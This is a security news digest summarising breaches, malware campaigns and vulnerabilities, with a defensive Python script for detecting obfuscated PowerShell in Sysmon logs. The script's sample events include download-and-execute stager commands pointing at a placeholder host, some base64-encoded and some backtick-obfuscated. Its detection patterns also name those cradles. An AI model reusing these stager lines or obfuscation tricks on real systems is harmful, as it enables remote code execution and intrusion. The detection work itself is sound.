Samsung Tickets Data Leak: Infostealers Strike Again in Massive Free Dump
This article covers a massive data breach at Samsung Germany: a hacker using the handle "GHNA" leaked roughly 270,000 customer support tickets after logging in with credentials that infostealer malware had stolen back in 2021 and that were never rotated. The breach underlines the danger of unmonitored, unrotated credentials: a years-old stealer log was enough to expose customer data and leave thousands of people open to fraud and privacy violations.…
Read More
Microsoft’s killing script used to avoid Microsoft Account in Windows 11
Summary: Microsoft has removed the BypassNRO.cmd script from Windows 11 preview builds; the script let users skip the Microsoft Account requirement during OS installation. Microsoft presents the change as a security improvement that also steers users toward the cloud-based services tied to Microsoft Accounts. The underlying bypass still works if the Registry value the script set is created by hand, though Microsoft may close that route as well.…
Read More
New Crocodilus malware steals Android users’ crypto wallet keys
Summary: Crocodilus, a new Android malware family, uses social engineering to trick victims into revealing their cryptocurrency wallet seed phrases. Delivered by a dropper that bypasses Android's security restrictions, it gives attackers control of the device and access to banking and crypto apps. First seen in Turkey and Spain, it has extensive remote-control capabilities that let operators manipulate the victim and drain their financial assets.…
Read More
RESURGE Malware Exploits Ivanti Flaw with Rootkit and Web Shell Features
Summary: The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has published an analysis of RESURGE, a new malware found on Ivanti Connect Secure appliances compromised through the recently patched CVE-2025-0282. RESURGE adds rootkit and web shell functionality that improves its persistence and evasion on the appliance. The activity is linked to espionage and possibly to state-sponsored actors.…
Read More
Unveiling APT28’s Advanced Obfuscated Loader and HTA Trojan: A Deep Dive with x32dbg Debugging
APT28 has been observed conducting cyber espionage against targets in Central Asia and Kazakhstan. This analysis walks through a heavily obfuscated malware sample, assessing its capabilities, in particular its VBScript components and its interaction with a command-and-control server. Affected: APT28, Central Asia, Kazakhstan

Keypoints :

APT28 is engaged in cyber espionage targeting Central Asia and Kazakhstan.…
Read More
New Android Trojan Crocodilus Abuses Accessibility to Steal Banking and Crypto Credentials
Summary: Cybersecurity researchers have identified Crocodilus, a new Android banking trojan that targets users in Spain and Turkey. Posing as a legitimate application, it abuses the Accessibility Service for device takeover and credential theft. It is a further sign of how complex and dangerous mobile threats, especially those aimed at banking users, have become.…
Read More

Summary: The video shows how to install the Fing agent on a Synology NAS, a Raspberry Pi or in a Docker container so that it monitors the network continuously and can block unwanted devices. The presenter walks through the Synology NAS installation step by step.

Keypoints:

Fing agent can be installed on a NAS, Raspberry Pi, or Docker container for 24/7 network monitoring.…
Read More
CISA has analysed three malicious files recovered from an Ivanti Connect Secure device compromised through CVE-2025-0282. The files resemble known malware and include command-and-control capabilities and log tampering. RESURGE, the primary file, can modify files and create a web shell. The second, a variant of SPAWNSLOTH, tampers with logs, while the third contains a shell script that extracts kernel images.…
Read More
Lotus Blossom, also known as Lotus Panda, is a sophisticated Chinese APT group that has conducted cyber espionage for over a decade. It has recently updated its tooling with new variants of the Sagerunex backdoor that use third-party cloud services and social media platforms for command and control. This article examines the group's tactics, techniques and procedures, its operational framework, and the difficulty of defending against such a persistent threat.…
Read More
A Deep Dive into Water Gamayun’s Arsenal and Infrastructure
Trend Research details the arsenal and infrastructure of Water Gamayun, a suspected Russian threat actor that exploited a zero-day in Microsoft Management Console (CVE-2025-26633) to deploy malware. The toolset includes custom payloads, backdoors and data exfiltration techniques, and the campaign exposes targeted organizations to data theft and operational disruption.…
Read More
Investigative Journalists in Serbia Hit by Advanced Spyware Attack
Summary: Two journalists from the Balkan Investigative Reporting Network (BIRN) in Serbia were targeted with Pegasus spyware, confirming a disturbing pattern of digital surveillance against civil society in Serbia. It is the third documented use of Pegasus against Serbian activists in recent years and underlines the repression and intimidation journalists there face.…
Read More
Firefox Patch Released as Mozilla Addresses Chrome-Like Security Threat
Summary: Mozilla has shipped an urgent Firefox update for Windows that fixes a critical sandbox escape (CVE-2025-2857) which could let an attacker break out of the browser's sandbox and reach the underlying system. The fix follows a similar, recently exploited flaw in Google Chrome, after which Firefox developers found a comparable pattern in their own IPC code. Users should update immediately.…
Read More
Detecting Obfuscated PowerShell Attacks Using Sysmon and the ELK Stack
This article describes a lab project for detecting obfuscated PowerShell attacks with Sysmon, Winlogbeat and the ELK stack. It lays out the challenges that PowerShell and command-line obfuscation pose for defenders and aims to give them hands-on detection experience. Students learn to generate and collect the right telemetry, spot the obfuscation patterns that mark malicious activity, and work with the tools used in real defensive operations.…
Read More
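The detection step the lab describes, as an added example that is not part of the original article or lab: a Python triage script that scores Sysmon Event ID 1 (process creation) command lines for obfuscation indicators such as -EncodedCommand (the payload is base64/UTF-16LE decoded and scanned as well), backtick-split keywords, [char] casts, string splitting and download cradles. The event records, host names, user names and the example.invalid URLs are constructed; the field names mirror Winlogbeat's winlog.event_data fields, and the weights and alert threshold are assumptions to tune against your own baseline.

```python
"""Triage Sysmon Event ID 1 (process creation) records for obfuscated PowerShell.

Added example, not code from the original lab write-up. Events are assumed to
arrive as dicts with Winlogbeat's winlog.event_data field names; every record,
host and URL below is constructed for illustration.
"""
import base64
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Weighted indicators, matched case-insensitively against the raw command line
# plus any decoded -EncodedCommand payload. Weights are assumptions to tune.
INDICATORS = [
    (r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", 3, "encoded-command"),
    (r"\b(?:iex|invoke-expression)\b", 3, "invoke-expression"),
    (r"frombase64string", 2, "base64-decode"),
    (r"downloadstring|downloadfile|invoke-webrequest|net\.webclient", 2, "web-download"),
    (r"\[char\]\s*\d+", 2, "char-cast"),
    (r"(?:^|\s)-(?:w|win|windowstyle)\s+hidden\b", 1, "hidden-window"),
    (r"(?:^|\s)-(?:nop|noprofile)\b", 1, "no-profile"),
    (r"(?:^|\s)-(?:ep|executionpolicy)\s+bypass\b", 1, "ep-bypass"),
]
BACKTICK_RE = re.compile(r"[A-Za-z]`[A-Za-z]")   # I`EX, Dow`nloadString
CONCAT_RE = re.compile(r"""['"]\s*\+\s*['"]""")    # 'ht'+'tp'
ENC_RE = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I)
# -NoProfile -ExecutionPolicy Bypass alone scores 2: common admin noise, so not alerted on.
ALERT_THRESHOLD = 4


def decode_encoded_command(cmd: str) -> Optional[str]:
    """Return the UTF-16LE text behind -EncodedCommand, or None if absent or malformed."""
    m = ENC_RE.search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_command_line(cmd: str) -> Tuple[int, List[str], Optional[str]]:
    """Score one command line; returns (score, indicator labels, decoded payload or None)."""
    decoded = decode_encoded_command(cmd)
    text = cmd if decoded is None else cmd + "\n" + decoded
    score, labels = 0, []
    if BACKTICK_RE.search(text):          # a backtick splitting a keyword is itself a signal
        score += 2
        labels.append("backtick-in-token")
    stripped = text.replace("`", "")      # un-escape so I`EX is matched as IEX below
    for pattern, weight, label in INDICATORS:
        if re.search(pattern, stripped, re.I):
            score += weight
            labels.append(label)
    concat = len(CONCAT_RE.findall(stripped))
    if concat >= 3:                       # 'ht'+'tp://'+... string splitting
        score += 2
        labels.append(f"string-concat x{concat}")
    return score, labels, decoded


def is_powershell(event: dict) -> bool:
    """True for powershell.exe/pwsh.exe images or command lines that launch PowerShell."""
    image = event.get("Image", "").lower()
    return image.endswith(("powershell.exe", "pwsh.exe")) or "powershell" in event.get("CommandLine", "").lower()


@dataclass
class Finding:
    computer: str
    user: str
    score: int
    indicators: List[str]
    decoded: Optional[str]


def triage(events: List[dict]) -> List[Finding]:
    """Return one Finding per PowerShell process-creation event at or above the threshold."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 1 or not is_powershell(ev):
            continue
        score, labels, decoded = score_command_line(ev["CommandLine"])
        if score >= ALERT_THRESHOLD:
            findings.append(Finding(ev["Computer"], ev["User"], score, labels, decoded))
    return findings


# Constructed sample events (hypothetical hosts, users and URLs).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
ENCODED = base64.b64encode(STAGER.encode("utf-16-le")).decode()  # what -EncodedCommand expects
SAMPLE_EVENTS = [
    {"EventID": 1, "Computer": "WS01", "User": r"CORP\alice", "Image": PS,
     "CommandLine": r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"},
    {"EventID": 1, "Computer": "WS02", "User": r"CORP\bob", "Image": PS,
     "CommandLine": f"powershell.exe -NoP -W Hidden -Enc {ENCODED}"},
    {"EventID": 1, "Computer": "WS03", "User": r"CORP\carol", "Image": PS,
     "CommandLine": "powershell.exe -w hidden -c \"$u='ht'+'tp://'+'example.invalid'+'/c.ps1';"
                    "$d=(New-Object Net.WebClient).Dow`nloadString($u);I`EX $d\""},
    {"EventID": 1, "Computer": "WS04", "User": r"CORP\dave",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c dir"},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f.computer} {f.user} score={f.score} {f.indicators}")
        if f.decoded:
            print("  decoded:", f.decoded)
```

The benign admin script (WS01) scores 2 and stays below the threshold, while the encoded stager (WS02) and the backtick/string-split cradle (WS03) both score 10; the decoded payload is carried into the finding so an analyst sees what the base64 hid. In ELK the same logic belongs in an ingest pipeline or a scheduled query over winlog.event_data.CommandLine, with the threshold raised or lowered after measuring how much legitimate automation in the estate uses -NoProfile and -ExecutionPolicy Bypass.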
StreamElements Confirms Third-Party Data Breach from an Infostealer Infection
StreamElements has disclosed a data breach affecting more than 100,000 individuals, caused by the compromise of a third-party service provider. Names, addresses and e-mail addresses were accessed after a Redline infostealer infection captured an employee's credentials, giving the attacker access to the provider's merchandise platform. Affected: StreamElements, Gooten.com,…
Read More
Use-After-Free Vulnerability in Exim Exposes Systems to Privilege Escalation
Summary: A critical vulnerability (CVE-2025-30232) has been found in Exim, a widely used mail transfer agent for Unix-like systems. The use-after-free bug may allow local privilege escalation under specific conditions, in particular for users who can invoke Exim from the command line. Administrators running affected versions should apply the patches promptly and review their hardening.…
Read More
Synapse Servers at Risk Due to Zero-Day DoS Flaw Exploited in the Wild
Summary: A critical zero-day vulnerability, CVE-2025-30355, in the Synapse Matrix homeserver allows denial of service through malformed events. The flaw is being exploited in the wild and affects Synapse up to and including version 1.127.0; administrators should upgrade to 1.127.1.

Affected: Synapse (Matrix homeserver implementation)

Keypoints :

Vulnerability CVE-2025-30355 has a CVSS score of 7.1.…
Read More
More Solar System Vulnerabilities Expose Power Grids to Hacking 
Summary: Researchers at Forescout have identified more than 90 vulnerabilities in solar power products from leading vendors including Sungrow, Growatt and SMA, with serious implications for electrical grids. The newly discovered flaws could let attackers take over inverters and execute arbitrary code, potentially disrupting power supply and exposing user data.…
Read More
SnapCenter Security Flaw Rated Critical—NetApp Urges Immediate Patch
Summary: A critical vulnerability (CVE-2025-26512, CVSS 9.9) in NetApp's SnapCenter allows an authenticated SnapCenter Server user to become an administrator on remote systems where a SnapCenter plug-in is installed. It affects SnapCenter releases prior to 6.0.1P1 and 6.1P1. No public exploitation has been reported, but organizations are urged to update to the fixed versions.…
Read More